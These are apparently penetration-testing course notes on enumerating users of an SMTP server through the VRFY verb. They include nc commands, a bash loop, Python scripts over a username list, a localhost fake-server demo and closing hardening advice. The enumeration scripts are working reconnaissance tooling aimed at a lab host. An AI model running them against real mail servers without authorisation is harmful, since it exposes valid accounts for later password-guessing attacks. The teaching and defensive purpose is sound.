EXPLOITING SMTP

====================================================================
SMTP ENUMERATION: ACTIVE INFORMATION GATHERING:
====================================================================

////////////////////////////////////////////////////////
//// MAIL SERVERS ARE THE TARGETS IN THE LABS HERE /////
////////////////////////////////////////////////////////

Python scripting:

Under certain misconfigurations, mail servers can also be used to gather information about a host or network.

SMTP supports several interesting verbs, including:
- EXPN - expand (lists the members of a mailing list or alias)
- VRFY - verify (confirms whether a mailbox or user exists)

Both divulge information about users configured on that server.

These verbs can often be abused by an attacker to verify existing users on a mail server, which can aid the attacker later, such as in a password brute-force attack.

Below, I connect to port 25 of a mail server in our labs known to have this enumeration weakness.
#nc -nv 192.168.31.215 25

The SMTP service replies with a banner that identifies it as a Sendmail 8 server.

Once connected, we can try the VRFY command to verify the existence of a user called bob on the system (typed into the open SMTP session, not at the shell):
VRFY bob

Now we check the response for a user that does not exist:
VRFY idontexist

Notice the difference in the SMTP responses. This is greppable: a 250 reply when the user exists, and 550 when it does not. Two other replies are worth recognising before trusting the result: 252 means the server will not confirm the user but will still accept mail for the address (VRFY effectively disabled), and 500/502 means the verb is not supported at all. Neither of those tells you whether the user exists, so a script that only looks for "250" will silently report nothing on such hosts.
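The exchange above, with both sides of the conversation and the 250/252/550/5xx distinction handled explicitly, as an added Python 3 example that is not part of the course notes. It talks to a constructed fake SMTP server running on localhost (an assumption standing in for the 192.168.31.215 lab host; the user set and the "lab.example" host name are invented for the demo), issues VRFY for a list of users over a single session, and joins "250-" continuation lines so a multi-line reply is not misread:

```python
import socket
import socketserver
import threading

# Constructed lab stand-in: a minimal fake SMTP server that answers VRFY the
# way the Sendmail 8 host in the text does (250 for known users, 550 otherwise).
# The user set and the host name are assumptions for this example only.
KNOWN_USERS = {"root", "bob", "david"}


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    def handle(self):
        self.wfile.write(b"220 lab.example ESMTP Sendmail 8.x; ready\r\n")
        while True:
            raw = self.rfile.readline()
            if not raw:
                break
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "VRFY":
                if arg in KNOWN_USERS:
                    # Two-line reply: a real server may answer with continuation lines
                    self.wfile.write(f"250-2.1.5 {arg}\r\n250 2.1.5 <{arg}@lab.example>\r\n".encode())
                else:
                    self.wfile.write(b"550 5.1.1 User unknown\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                break
            else:
                self.wfile.write(b"500 5.5.1 Command unrecognized\r\n")


def start_fake_server():
    """Bind the fake server to an ephemeral localhost port and serve in the background."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def read_reply(f):
    """Read one complete SMTP reply, joining 'NNN-' continuation lines into one string."""
    lines = []
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return "\n".join(lines)


def classify(reply):
    """Map the three-digit reply code to what it tells us about the user."""
    code = reply[:3]
    if code == "250":
        return "exists"
    if code == "550":
        return "absent"
    if code == "252":
        return "unverifiable"   # server will accept mail but refuses to confirm the user
    if code in ("500", "502"):
        return "disabled"       # VRFY not supported; no information either way
    return "unknown"


def vrfy_users(host, port, users, timeout=5.0):
    """Connect once, VRFY every user on the same session, return (banner, {user: (verdict, reply)})."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rwb")
        banner = read_reply(f)
        for user in users:
            f.write(f"VRFY {user}\r\n".encode())
            f.flush()
            reply = read_reply(f)
            results[user] = (classify(reply), reply)
        f.write(b"QUIT\r\n")
        f.flush()
        f.close()
    return banner, results


def demo(users):
    """Run the enumeration against the constructed fake server; returns (banner, results)."""
    srv = start_fake_server()
    try:
        return vrfy_users("127.0.0.1", srv.server_address[1], users)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    banner, results = demo(["root", "bob", "idontexist"])
    print(banner)
    for user, (verdict, reply) in results.items():
        print(f"{user:12} {verdict:13} {reply.splitlines()[0]}")
```

Against a real target, replace the fake server with the lab host and port 25; the client side is unchanged. Reusing one session for all names is both faster and quieter in the mail log than reconnecting per user.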

SMTP ENUMERATION: ACTIVE INFORMATION GATHERING: SMTP VRFY Bash Script


A list of users in users.txt
root
backup
bob
dick
david
harry
apache
igor
ron
mike
harry
joseph

In a real world scenario, this list of users would be filled with information found in the user information gathering stage.

Automatically connect to the SMTP server on port 25 and issue the VRFY command for each user in users.txt (the port must be given to nc, otherwise nothing is sent):

#for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 192.168.31.215 25 2>/dev/null | grep ^"250"; done

In a script:

----------------------------------------------
#!/bin/bash
# Issue VRFY for every name in users.txt and keep only the 250 (user exists) replies.
# nc's connection chatter goes to stderr, so 2>/dev/null leaves only the SMTP replies for grep.
for user in $(cat users.txt); do
    echo VRFY $user | nc -nv -w 1 192.168.31.215 25 2>/dev/null | grep ^"250";
done
------------------------------------------------

SMTP ENUMERATION: ACTIVE INFORMATION GATHERING: SMTP VRFY Python Port

-------------------------------------------------------
#!/usr/bin/env python3

import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # Create a socket
s.connect(('192.168.31.215', 25))                       # Connect to the server
banner = s.recv(1024)                                    # Receive the banner
print(banner.decode(errors='replace'))
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())        # VRFY a user
result = s.recv(1024)                                    # Read the 250/550 reply
print(result.decode(errors='replace'))
s.close()                                                # Close the socket
--------------------------------------------------------

***************************************
***************************************
***************************************
***************************************
***************************************
EXERCISE HERE:
Complete porting the script so that it takes a text file of usernames as input.

E.g. when the script runs, I want to be able to give it a file name instead of a username.

***************************************
***************************************
***************************************
***************************************
***************************************
This same type of check via brute-force methods can be applied anywhere a service's output is overly verbose, and this kind of information should not be disclosed by a server. On the defensive side, VRFY and EXPN should be disabled on mail servers: in Sendmail, set PrivacyOptions to include novrfy and noexpn (or goaway); in Postfix, set disable_vrfy_command = yes in main.cf.